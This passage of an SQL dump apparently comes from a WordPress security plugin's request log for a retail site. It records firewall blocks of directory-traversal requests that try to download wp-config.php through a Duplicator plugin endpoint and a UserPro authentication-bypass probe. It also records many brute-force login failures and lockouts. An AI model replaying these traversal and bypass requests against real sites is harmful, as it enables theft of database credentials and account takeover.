wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8033,1629498858.041149,1629498857.959800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8034,1629498908.202819,1629498908.120000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8035,0.000000,1629499416.461192,'\0\0\0\0\0\0\0\0\0\0��N�$b',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8036,0.000000,1629499867.680674,'\0\0\0\0\0\0\0\0\0\0���aZ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','loginFailValidUsername',NULL,NULL),(8037,0.000000,1629500245.365225,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8038,0.000000,1629500430.010447,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8039,0.000000,1629500430.309304,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8040,0.000000,1629500430.633054,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8041,0.000000,1629500431.004716,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8042,0.000000,1629500431.725400,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8043,0.000000,1629500432.099466,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8044,0.000000,1629500432.561125,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8045,0.000000,1629500432.875183,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8046,0.000000,1629500433.181326,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8047,0.000000,1629500433.621104,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8048,0.000000,1629500434.022561,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8049,0.000000,1629500434.451955,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8050,0.000000,1629500434.894913,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8051,0.000000,1629500435.237459,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8052,0.000000,1629500435.565562,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','loginFailValidUsername',NULL,NULL),(8053,0.000000,1629500435.915792,'\0\0\0\0\0\0\0\0\0\0��-�H�',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',NULL),(8054,0.000000,1629501149.826526,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8055,0.000000,1629502065.873768,'\0\0\0\0\0\0\0\0\0\0����B',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8056,0.000000,1629502973.316741,'\0\0\0\0\0\0\0\0\0\0��hƬD',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8057,0.000000,1629503083.364160,'\0\0\0\0\0\0\0\0\0\0���T',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(8058,0.000000,1629503933.487961,'\0\0\0\0\0\0\0\0\0\0��>��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8059,0.000000,1629504692.427408,'\0\0\0\0\0\0\0\0\0\0��:��^',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(8060,0.000000,1629504885.412495,'\0\0\0\0\0\0\0\0\0\0��#�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8061,0.000000,1629505862.482744,'\0\0\0\0\0\0\0\0\0\0����jQ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8062,0.000000,1629506311.934679,'\0\0\0\0\0\0\0\0\0\0���㪽',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','loginFailValidUsername',NULL,NULL),(8063,0.000000,1629506835.744211,'\0\0\0\0\0\0\0\0\0\0��ٓ�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8064,0.000000,1629507851.878670,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8065,0.000000,1629507931.382458,'\0\0\0\0\0\0\0\0\0\0�����M',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','loginFailValidUsername',NULL,NULL),(8066,0.000000,1629508882.668713,'\0\0\0\0\0\0\0\0\0\0��l�7�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8067,0.000000,1629509913.918013,'\0\0\0\0\0\0\0\0\0\0�����4',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8068,0.000000,1629510959.222307,'\0\0\0\0\0\0\0\0\0\0��e >�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8069,0.000000,1629511180.583215,'\0\0\0\0\0\0\0\0\0\0���F��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(8070,0.000000,1629512025.452369,'\0\0\0\0\0\0\0\0\0\0���@w',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8071,0.000000,1629513144.503341,'\0\0\0\0\0\0\0\0\0\0�����F',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8072,0.000000,1629514242.838188,'\0\0\0\0\0\0\0\0\0\0���@uK',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8073,0.000000,1629514432.926635,'\0\0\0\0\0\0\0\0\0\0���1N',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','loginFailValidUsername',NULL,NULL),(8074,0.000000,1629515389.536161,'\0\0\0\0\0\0\0\0\0\0��E��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8075,0.000000,1629516071.630983,'\0\0\0\0\0\0\0\0\0\0��H�*',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(8076,0.000000,1629516539.863801,'\0\0\0\0\0\0\0\0\0\0��@Z0�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8077,0.000000,1629517672.724621,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8078,0.000000,1629518270.660926,'\0\0\0\0\0\0\0\0\0\0����^�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(8079,0.000000,1629519472.930897,'\0\0\0\0\0\0\0\0\0\0����R{',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8080,0.000000,1629519923.871566,'\0\0\0\0\0\0\0\0\0\0���;v�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','loginFailValidUsername',NULL,NULL),(8081,0.000000,1629522035.329971,'\0\0\0\0\0\0\0\0\0\0��+�)�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8082,0.000000,1629523240.597572,'\0\0\0\0\0\0\0\0\0\0���wң',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(8083,0.000000,1629523364.486840,'\0\0\0\0\0\0\0\0\0\0��m��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8084,0.000000,1629524673.355129,'\0\0\0\0\0\0\0\0\0\0����dl',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8085,0.000000,1629524890.288856,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(8086,0.000000,1629526038.249821,'\0\0\0\0\0\0\0\0\0\0���@r',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8087,0.000000,1629527252.971825,'\0\0\0\0\0\0\0\0\0\0���[K ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8088,0.000000,1629527901.126473,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8089,0.000000,1629527901.422321,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8090,0.000000,1629527901.627746,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8091,0.000000,1629527901.828914,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8092,0.000000,1629527902.014820,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8093,0.000000,1629527902.234063,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8094,0.000000,1629527902.437546,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8095,0.000000,1629527902.623174,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8096,0.000000,1629527902.827700,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8097,0.000000,1629527903.014462,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8098,0.000000,1629527903.203394,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8099,0.000000,1629527903.389444,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8100,0.000000,1629527903.580995,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8101,0.000000,1629527903.779650,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8102,0.000000,1629527904.076799,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8103,0.000000,1629527904.295856,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8104,0.000000,1629527904.487849,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8105,0.000000,1629527904.687077,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8106,0.000000,1629527904.922270,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8107,0.000000,1629527905.109644,'\0\0\0\0\0\0\0\0\0\0��>�Rt',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'endekunori\'',NULL),(8108,0.000000,1629528033.814981,'\0\0\0\0\0\0\0\0\0\0���-�B',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8109,0.000000,1629528210.423651,'\0\0\0\0\0\0\0\0\0\0����/�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','loginFailValidUsername',NULL,NULL),(8110,0.000000,1629528675.900152,'\0\0\0\0\0\0\0\0\0\0��[�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8111,0.000000,1629529321.220190,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8112,0.000000,1629529900.224685,'\0\0\0\0\0\0\0\0\0\0�����@',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','loginFailValidUsername',NULL,NULL),(8113,0.000000,1629529921.285858,'\0\0\0\0\0\0\0\0\0\0���a�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8114,0.000000,1629530353.482291,'\0\0\0\0\0\0\0\0\0\0��E�',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','loginFailInvalidUsername',NULL,NULL),(8115,0.000000,1629530527.783665,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8116,0.000000,1629531154.886968,'\0\0\0\0\0\0\0\0\0\0���n��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8117,0.000000,1629531566.538162,'\0\0\0\0\0\0\0\0\0\0��*��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','loginFailValidUsername',NULL,NULL),(8118,0.000000,1629531776.870811,'\0\0\0\0\0\0\0\0\0\0��E���',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8119,0.000000,1629532419.205026,'\0\0\0\0\0\0\0\0\0\0���B��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8120,0.000000,1629533065.834199,'\0\0\0\0\0\0\0\0\0\0��N��4',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8121,0.000000,1629533197.420235,'\0\0\0\0\0\0\0\0\0\0��j4��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 